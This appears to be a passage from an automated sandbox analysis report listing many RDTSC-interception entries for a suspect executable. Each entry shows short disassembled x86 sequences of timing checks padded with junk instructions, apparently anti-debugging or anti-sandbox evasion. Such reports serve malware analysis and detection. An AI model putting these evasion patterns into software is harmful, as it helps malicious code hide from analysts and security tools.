              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C05 second address: 762C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 ja 00007F3874C2D1D6h 0x0000000c jmp 00007F3874C2D1E6h 0x00000011 je 00007F3874C2D1D6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007F3874C2D213h 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F3874C2D1D6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C40 second address: 762C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DA4 second address: 762DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DAA second address: 762DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F68 second address: 762F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F3874C2D1D6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F87 second address: 762F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7681AC second address: 7681B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D18C second address: 76D1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F38751214A6h 0x0000000a jns 00007F38751214A6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jl 00007F38751214A6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BFA4 second address: 76BFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C94D second address: 76C951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CBC0 second address: 76CBC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CD6F second address: 76CD77 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CEF2 second address: 76CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D030 second address: 76D053 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F38751214B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D053 second address: 76D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D058 second address: 76D05D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772451 second address: 772457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772457 second address: 772479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B7h 0x00000009 jng 00007F38751214A6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772479 second address: 772495 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3874C2D1E2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772495 second address: 7724A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7724A3 second address: 7724C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F3874C2D1D6h 0x00000012 popad 0x00000013 jo 00007F3874C2D1E7h 0x00000019 jmp 00007F3874C2D1DBh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771188 second address: 77118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77118E second address: 771192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771192 second address: 771198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771745 second address: 771760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c jp 00007F3874C2D1D6h 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771760 second address: 771764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7718A0 second address: 7718A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7718A6 second address: 7718AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747F30 second address: 747F43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747F43 second address: 747F58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C893 second address: 74C899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C97B second address: 74C99B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751230 second address: 751234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7521E6 second address: 7521EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751234 second address: 75123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7521EA second address: 7521EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7521EE second address: 7521F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753173 second address: 753184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753184 second address: 75318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771CE9 second address: 771CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771E25 second address: 771E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F3874C2D1DCh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771E36 second address: 771E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F38751214A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771E45 second address: 771E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772169 second address: 77217C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F38751214A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777FB2 second address: 777FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDE3F second address: 6FDE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F38751214ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDE4C second address: 6FDE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3874C2D1E8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E0FC second address: 77E100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E100 second address: 77E10C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F3874C2D1D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DC10 second address: 73DC1E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DC1E second address: 73DC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E0DC second address: 73E0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E16E second address: 73E178 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E178 second address: 73E17E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7553CF second address: 7553D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7553D3 second address: 7553F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F38751214A6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7553F7 second address: 755404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755404 second address: 755408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755408 second address: 755415 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75635B second address: 75635F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75635F second address: 756370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E4A4 second address: 73E4D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a js 00007F38751214ACh 0x00000010 mov dword ptr [ebp+122D1B7Ah], edi 0x00000016 push 00000004h 0x00000018 jmp 00007F38751214AAh 0x0000001d push eax 0x0000001e jl 00007F38751214B0h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758417 second address: 75841E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A2E9 second address: 75A2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759478 second address: 75947D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75947D second address: 75948E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E94B second address: 73E94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E94F second address: 73E953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E953 second address: 73E969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F3874C2D1DCh 0x00000010 jc 00007F3874C2D1D6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EBF5 second address: 73EBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EBF9 second address: 73EBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EC7A second address: 73EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EC7E second address: 73EC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EC82 second address: 73EC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EC88 second address: 725CD0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F3874C2D1E4h 0x0000000f nop 0x00000010 mov dx, 3787h 0x00000014 call dword ptr [ebp+122D1F2Ah] 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F3874C2D1F6h 0x00000022 jmp 00007F3874C2D1E5h 0x00000027 jmp 00007F3874C2D1DBh 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725CD0 second address: 725CD5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725CD5 second address: 725CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725CE0 second address: 725CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E552 second address: 77E558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77EAAC second address: 77EAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77EAC4 second address: 77EAD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3874C2D1DEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77EC79 second address: 77EC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77EC7F second address: 77EC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77EC85 second address: 77EC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7849D4 second address: 7849D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7849D8 second address: 7849EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F38751214A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F38751214A6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783B8F second address: 783B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783CFA second address: 783D09 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783E9F second address: 783ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3874C2D1E7h 0x00000010 jmp 00007F3874C2D1DDh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783ECE second address: 783EDC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783EDC second address: 783EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783EE2 second address: 783EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784042 second address: 784062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3874C2D1E4h 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784062 second address: 784067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784229 second address: 78424C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F3874C2D1E2h 0x0000000f push edi 0x00000010 jl 00007F3874C2D1D6h 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7843A9 second address: 7843B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78480C second address: 784812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870C4 second address: 7870E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B9h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870E5 second address: 7870F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 jng 00007F3874C2D1DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786DAF second address: 786DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789D19 second address: 789D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E7h 0x00000009 jmp 00007F3874C2D1E6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F3874C2D1D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789D55 second address: 789D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
